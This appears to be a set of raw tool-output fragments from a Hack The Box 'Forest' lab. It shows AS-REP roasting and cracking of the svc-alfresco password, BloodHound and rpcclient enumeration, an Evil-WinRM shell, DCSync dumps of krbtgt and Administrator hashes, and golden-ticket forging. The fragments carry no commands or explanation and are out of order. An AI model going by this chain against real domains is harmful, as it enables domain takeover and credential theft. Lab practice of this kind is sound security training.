[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for htb.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncAsRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
[*] Cleaning up...

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Cleaning up...

INFO: Found AD domain: htb.local
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
WARNING: Could not resolve SID: S-1-5-21-3072663084-364016917-1341370565-1153
INFO: Found 31 users
INFO: Found 75 groups
INFO: Found 0 trusts

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> dir C:\Users\svc-alfresco\Desktop\user.txt
Directory: C:\Users\svc-alfresco\Desktop

Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:04 DONE (2020-03-22 13:39) 0.2207g/s 901933p/s 901933c/s 901933C/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Name          MemberOf                                                PasswordLastSet             LastLogon                   UAC
------------  ------------------------------------------------------  --------------------------  --------------------------  --------
svc-alfresco  CN=Service Accounts,OU=Security Groups,DC=htb,DC=local  2020-03-26 23:40:39.044925  2020-03-26 20:23:12.568590  0x410200
$krb5asrep$23$svc-alfresco@HTB.LOCAL:b3267a6ae9aa9e65e8420f161d843772$586e8db69f3b75d97cec66be5659031ace5f68e7e475ff8a3ad0a691a465c0d1d3ed714381bfc535c3e31093c5d55da18a9414ffb5e845fd525ee6e2e75b74f1d40ac19fa54fc1d627ace3fb6c3ab22cc4220cbc32a85ce13752fcf38e47e770b4418a2b5e02b13e62bbd9608b7eaf83d13c0fe589b0b2a4cd4eb25056a3c6e20e713eea3cdf98c7269359ae66afa6b7a640f94c46b37270f43cecb7b52d84c45e44f2943ac89beb7113be8382d974ddb578ae7a0da696b501902a1536547d59f17363b27a6f6a886464bb8b8b2096fe046b1773edeafa016b9e2427cce1bc060df4a82e1510 |

rpcclient $> queryusergroups 0x47b
group rid:[0x201] attr:[0x7]
group rid:[0x47c] attr:[0x7]
rpcclient $> querygroup 0x201
Group Name: Domain Users
Description: All domain users
Group Attribute:7
Num Members:30

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]

SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:HTB) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [-] HTB\: STATUS_ACCESS_DENIED
SMB 10.10.10.161 445 FOREST [+] Enumerated domain user(s)
SMB 10.10.10.161 445 FOREST htb.local\Administrator badpwdcount: 0 baddpwdtime: 2019-09-22 18:30:53.383284
SMB 10.10.10.161 445 FOREST htb.local\Guest badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 10.10.10.161 445 FOREST htb.local\DefaultAccount badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 10.10.10.161 445 FOREST htb.local\krbtgt badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB 10.10.10.161 445 FOREST htb.local\$331000-VK4ADACQNUCA badpwdcount: 0 baddpwdtime: 1600-12-31 19:03